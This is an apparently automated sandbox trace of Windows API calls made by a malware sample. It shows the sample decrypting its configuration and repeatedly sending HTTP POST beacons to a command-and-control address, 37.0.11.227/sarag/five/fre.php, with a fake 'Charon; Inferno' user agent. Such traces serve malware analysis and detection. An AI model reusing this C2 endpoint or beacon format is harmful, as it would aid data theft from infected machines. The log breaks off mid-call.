0x6a4418 [0271.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.600] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0271.621] GetProcessHeap () returned 0x690000 [0271.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0271.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.623] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.630] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.631] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.631] GetProcessHeap () returned 0x690000 [0271.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0271.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.633] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0271.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.634] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.636] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0271.636] GetProcessHeap () returned 0x690000 [0271.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.641] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0271.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.642] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0271.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.643] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0271.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.645] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0271.645] GetProcessHeap () returned 0x690000 [0271.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0271.645] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0271.645] GetProcessHeap () returned 0x690000 [0271.645] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0271.645] socket (af=2, type=1, protocol=6) returned 0x830 [0271.646] connect (s=0x830, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0271.674] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0271.674] GetProcessHeap () returned 0x690000 [0271.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0271.674] GetProcessHeap () returned 0x690000 [0271.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0271.675] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.676] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.676] GetProcessHeap () returned 0x690000 [0271.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0271.676] GetProcessHeap () returned 0x690000 [0271.677] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.677] GetProcessHeap () returned 0x690000 [0271.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0271.677] GetProcessHeap () returned 0x690000 [0271.677] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0271.678] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.679] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.680] GetProcessHeap () returned 0x690000 [0271.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0271.680] GetProcessHeap () returned 0x690000 [0271.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.680] send (s=0x830, buf=0x6ad508*, len=242, flags=0) returned 242 [0271.681] send (s=0x830, buf=0x6aba40*, len=159, flags=0) returned 159 [0271.681] GetProcessHeap () returned 0x690000 [0271.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0271.681] recv (in: s=0x830, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0271.763] GetProcessHeap () returned 0x690000 [0271.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0271.764] GetProcessHeap () returned 0x690000 [0271.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0271.764] GetProcessHeap () returned 0x690000 [0271.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0271.766] GetProcessHeap () returned 0x690000 [0271.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0271.766] closesocket (s=0x830) returned 0 [0271.767] GetProcessHeap () returned 0x690000 [0271.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0271.767] GetProcessHeap () returned 0x690000 [0271.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.768] GetProcessHeap () returned 0x690000 [0271.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0271.768] GetProcessHeap () returned 0x690000 [0271.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0271.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15e4) returned 0x830 [0271.770] Sleep (dwMilliseconds=0xea60) [0271.773] GetProcessHeap () returned 0x690000 [0271.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0271.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.774] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0271.788] GetProcessHeap () returned 0x690000 [0271.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0271.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.789] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.790] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.792] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.792] GetProcessHeap () returned 0x690000 [0271.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0271.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.794] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0271.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.795] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.796] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0271.796] GetProcessHeap () returned 0x690000 [0271.796] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.797] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.859] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.876] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.877] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.877] GetProcessHeap () returned 0x690000 [0271.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0271.877] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.877] GetProcessHeap () returned 0x690000 [0271.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0271.877] GetProcessHeap () returned 0x690000 [0271.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0271.878] GetProcessHeap () returned 0x690000 [0271.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0271.878] GetProcessHeap () returned 0x690000 [0271.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0271.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.879] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.883] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0271.889] GetProcessHeap () returned 0x690000 [0271.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0271.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.890] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0271.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.891] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.892] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.892] GetProcessHeap () returned 0x690000 [0271.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0271.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.893] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0271.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.894] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0271.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0271.895] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0271.895] GetProcessHeap () returned 0x690000 [0271.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0271.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.896] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0271.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.897] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0271.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.898] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0271.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0271.899] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0271.899] GetProcessHeap () returned 0x690000 [0271.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0271.899] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0271.899] GetProcessHeap () returned 0x690000 [0271.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0271.899] socket (af=2, type=1, protocol=6) returned 0x834 [0271.899] connect (s=0x834, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0271.923] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0271.923] GetProcessHeap () returned 0x690000 [0271.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0271.923] GetProcessHeap () returned 0x690000 [0271.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0271.924] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.925] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.925] GetProcessHeap () returned 0x690000 [0271.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0271.925] GetProcessHeap () returned 0x690000 [0271.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.925] GetProcessHeap () returned 0x690000 [0271.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0271.925] GetProcessHeap () returned 0x690000 [0271.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0271.926] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0271.927] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.927] GetProcessHeap () returned 0x690000 [0271.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0271.927] GetProcessHeap () returned 0x690000 [0271.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0271.927] send (s=0x834, buf=0x6ad508*, len=242, flags=0) returned 242 [0271.928] send (s=0x834, buf=0x6aba40*, len=159, flags=0) returned 159 [0271.928] GetProcessHeap () returned 0x690000 [0271.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0271.928] recv (in: s=0x834, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0272.030] GetProcessHeap () returned 0x690000 [0272.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0272.031] GetProcessHeap () returned 0x690000 [0272.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0272.032] GetProcessHeap () returned 0x690000 [0272.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0272.033] GetProcessHeap () returned 0x690000 [0272.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0272.033] closesocket (s=0x834) returned 0 [0272.034] GetProcessHeap () returned 0x690000 [0272.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0272.034] GetProcessHeap () returned 0x690000 [0272.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0272.035] GetProcessHeap () returned 0x690000 [0272.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0272.036] GetProcessHeap () returned 0x690000 [0272.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0272.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15ec) returned 0x834 [0272.039] Sleep (dwMilliseconds=0xea60) [0272.040] GetProcessHeap () returned 0x690000 [0272.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0272.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.042] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0272.092] GetProcessHeap () returned 0x690000 [0272.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0272.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.093] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0272.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.094] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.129] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.129] GetProcessHeap () returned 0x690000 [0272.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0272.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.131] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0272.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.132] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0272.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.133] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0272.133] GetProcessHeap () returned 0x690000 [0272.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0272.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.134] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.134] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.135] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0272.136] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.136] GetProcessHeap () returned 0x690000 [0272.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0272.136] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.137] GetProcessHeap () returned 0x690000 [0272.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0272.137] GetProcessHeap () returned 0x690000 [0272.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0272.138] GetProcessHeap () returned 0x690000 [0272.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0272.138] GetProcessHeap () returned 0x690000 [0272.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0272.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.139] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.143] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0272.148] GetProcessHeap () returned 0x690000 [0272.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0272.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.149] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0272.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.150] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0272.151] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.151] GetProcessHeap () returned 0x690000 [0272.152] HeapFree (in: 